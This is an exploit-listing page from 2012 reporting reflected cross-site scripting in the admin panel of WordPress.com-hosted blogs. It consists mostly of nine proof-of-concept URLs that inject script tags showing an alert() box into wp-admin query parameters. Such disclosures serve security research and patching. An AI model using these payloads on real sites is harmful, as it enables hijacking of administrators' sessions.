Home / exploits WordPress Blog Cross Site Scripting
Posted on 12 January 2012
############################################################################################################### # Exploit Title: Wordpress Blog ( hosted by Wordpress.com ) - Admin Panel Reflected Cross-Site Scripting ( XSS ) # Script Page : http://wordpress.com # Date: 10-01-2012 # Author : RandomStorm - http://www.randomstorm.com # Avram Marius Gabriel (d3v1l) # Tested on: Windows XP & Vista (IE9) ############################################################################################################### # Cross-Site Scripting (XSS) # POC: # http://site.com//wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1 # http://site.com//wp-admin/paid-upgrades.php?id=04a60d"><script>alert(1)</script>8b5efd72d71 # http://site.com/wp-admin/index.php?page=my-comments&e3771"><script>alert(1)</script>9198e439b5b=1 # http://site.com/wp-admin/edit.php?7ea9d"><script>alert(1)</script>4179dee262d=1 # http://site.com/wp-admin/post-new.php?cape7739"><script>alert(1)</script>154225169bf#cap # http://site.com/wp-admin/tools.php?36eae"><script>alert(1)</script>3ee8cbf0807=1 # http://site.com/wp-admin/post.php?post=28ce53"><script>alert(1)</script>7d542a3eb0c&action=edit # http://site.com/wp-admin/widgets.php?1a6e1"><script>alert(1)</script>fca8623d09b=1 # http://site.com/wp-admin/import.php?b90df"><script>alert(1)</script>4f0256c6187=1 ################################################################################################################ # No version ! they use a dedicated script # Works on Internet Explorer v9 ################################################################################################################
